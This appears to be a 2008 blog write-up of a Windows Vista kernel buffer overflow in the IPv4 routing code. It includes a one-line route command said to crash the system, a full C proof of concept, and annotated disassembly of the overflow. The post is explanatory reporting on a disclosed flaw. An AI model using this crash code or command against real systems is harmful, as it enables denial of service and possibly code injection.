CNet reported not long ago about a new vulnerability found in the kernel of Vista[1]. The attack is a buffer overflow which corrupts the memory, and thus could be use for denial of service attacks. The report from Phion, the security company that reported the vulnerability, also states that the attack could be used to inject code[2].
The buffer overflow is caused by adding an IP address with an illegal subnet bits value to the IPv4 routing table: For example the following command will make Vista crash with a blue screen of death:
C:>route add 127.0.0.1/250 127.0.0.2
In the command above, we specified 254 as being the number of subnet bits, which is an illegal value. According to the vulnerability report by Thomas Unterleitner, the greater the value is, the quicker the crash is provoked[3].
The overflow is located into the CreateIpForwardEntry2 method which is part of the Iphlpapi library (Iphlpapi.dll). The problem arises because the method doesn’t verify the value of the PrefixLength property of DestinationPrefix specified in the MIB_IPFORWARD_ROW2 structure passed to the method. Therefore, the following code should crash the kernel[4]:
1: #define _WIN32_WINNT 0x0600 2: #define WIN32_LEAN_AND_MEAN 3: 4: #include <windows.h> 5: #include <winsock2.h> 6: #include <ws2ipdef.h> 7: #include <iphlpapi.h> 8: 9: #include <stdio.h> 10: #include <stdlib.h> 11: 12: int main(int argc, char** argv) 13: 14: DWORD dwStatus; 15: MIB_IPFORWARD_ROW2 route; 16: 17: if (argc != 3) 18: { 19: printf("Usage: %s <ifNum> <numOfBits>\n\n", argv[0]); 20: return -1; 21: } 22: 23: InitializeIpForwardEntry(&route); 24: 25: route.InterfaceIndex = atoi(argv[1]); 26: route.DestinationPrefix.Prefix.si_family = AF_INET; 27: 28: route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr 29: = inet_addr("1.2.3.0"); 30: route.DestinationPrefix.Prefix.Ipv4.sin_family = AF_INET; 31: 32: route.DestinationPrefix.PrefixLength = atoi(argv[2]); 33: 34: route.NextHop.Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44"); 35: route.NextHop.Ipv4.sin_family = AF_INET; 36: 37: route.SitePrefixLength = 0; 38: 39: route.Protocol = MIB_IPPROTO_NETMGMT; 40: route.Origin = NlroManual; 41: route.ValidLifetime = 0xffffffff; 42: route.PreferredLifetime = 0xffffffff; 43: route.Metric = 1; 44: 45: dwStatus = CreateIpForwardEntry2(&route); 46: return dwStatus;
In order for this code to work you must be in the Administrators group or in the Network Operators Group…so it’s of limited use for most people, but you never know…
NETIO!PtpCopyPartialKeys: mov edi,edi push ebp mov ebp,esp movzx eax,word ptr [ebp+10h] ; = 0x00ee PrefixLength in bits add eax,7 shr eax,3 push eax ; 0x0000001e PrefixLength in bytes push dword ptr [ebp+0Ch] ; 0x934b7ac4 src buffer push dword ptr [ebp+8] ; 0x83716398 dst buffer ; 83716398 00 00 00 00 00 00 00 00-05 00 06 04 45 76 65 ee ; 837163a8 01 00 00 00 01 00 00 00-78 81 15 83 00 00 00 00 ; 837163b8 18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00 ; ------------------------------------------------------------------ call NETIO!memcpy ; memcpy(0x83716398, 0x934b7ac4, 0x0000001e) // BUFFER OVERFLOW!!!! ; ------------------------------------------------------------------ ; 83716398 01 02 03 04 00 00 00 00-00 13 6c 83 48 7b 4b 93 ; 837163a8 78 62 8b 85 00 13 6c 83-48 13 6c 83 78 00 00 00 ; 837163b8 18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00 ; compare the byte values with the src buffer printed before add esp,0Ch pop ebp ret 0Ch neg ecx push ecx
Microsoft said it had no intention of patching this buffer overflow before the next Vista service pack[5]. This exploit doesn’t apply to Windows XP.
[1] “Kernel vulnerability found in Vista”, David Meyer, CNet Security, November 22, 2008, http://news.cnet.com/8301-1009_3-10106173-83.html?part=rss&subj=news&tag=2547-1_3-0-20 (accessed on November 25, 2008)
[2] “Microsoft VISTA TCP/IP stack buffer overflow”, Thomas Unterleitner, November 19, 2008, http://www.securityfocus.com/archive/1/498471 (accessed on November 25, 2008)
[3] Ibid.
[4] Ibid. Code by Thomas Unterleitner
[5] “Vista kernel is vulnerable”, Egan Orion, The Inquirer, November 24, 2008, http://www.theinquirer.net/gb/inquirer/news/2008/11/24/vista-kernel-vulnerable (accessed on November 25, 2008)